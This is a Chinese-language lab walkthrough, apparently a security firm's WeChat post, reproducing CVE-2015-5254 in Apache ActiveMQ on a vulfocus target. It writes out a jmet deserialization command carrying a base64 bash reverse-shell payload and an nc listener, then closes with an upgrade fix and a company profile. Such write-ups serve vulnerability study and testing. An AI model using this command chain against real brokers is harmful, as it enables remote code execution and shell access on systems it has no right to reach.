漏洞介绍:
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。
漏洞影响版本:
Apache ActiveMQ 5.13.0之前5.x版本
漏洞复现:
1、首先打开vulfocus然后在首页搜索cve-2015-5254,打开靶场
2、下载jmet-0.1.0-all.jar
https://github.com/matthiaskaiser/jmet/releases
3、构造poc
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,xxx}|{base64,-d}|{bash,-i}" -Yp ROME xxx 27521
运行
4、查看队列消息
http://vulfocus.fofa.so:61634/admin/browse.jsp?JMSDestination=event
5、vps监听
nc -lvnp 1234
6、点击队列消息,查看内容
成功反弹shell
修复建议:
升级最新版本
参考链接:
https://github.com/matthiaskaiser/jmet/releases
https://blog.csdn.net/weixin_45146120/article/details/106592766
欢迎关注“天大天财”
关于天大天财
内蒙古天大天财信息技术有限责任公司,成立于1999年,是集网络安全服务、安全集成、计算机系统集成、公共安全技术防范系统设计|施工|维修为一体的综合性高科技信息公司
专注产生价值,天大天财致力于做内蒙古网络安全设计、实施、运维服务综合实力最强的本土品牌,我们潜心了解客户业务需求及痛点,注重提升与客户的粘合度,赢得了客户与市场的认可,享有很好的商誉;我们坚持以技术实施、服务为基础,注重技术团队的培养与提升,拥有一支技术过硬的服务团队,能够为全区客户提供及时的应急支援服务,同时,为了能够为客户做更优质更有水准的安全服务,我们成立了天大天财安全实验室,推出了自己的安全服务产品,收到客户的高度认可。
2018年被评为内蒙古网络安全行业协会理事长单位,获得内蒙古自治区科技型企业资质以及高新技术企业证书,涉密资质由原来的三项(集成、运维、安防)新增一项国家秘密载体印制资质证书.
连续三年参加省级攻防演练。
服务能力图示:
服务热线:0471-2658551/552/553
地址:内蒙古自治区呼和浩特市赛罕区昭乌达路世纪六路鸿博大厦4层
原文始发于微信公众号(天大天财):ActiveMq 命令执行 (cve-2015-5254)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论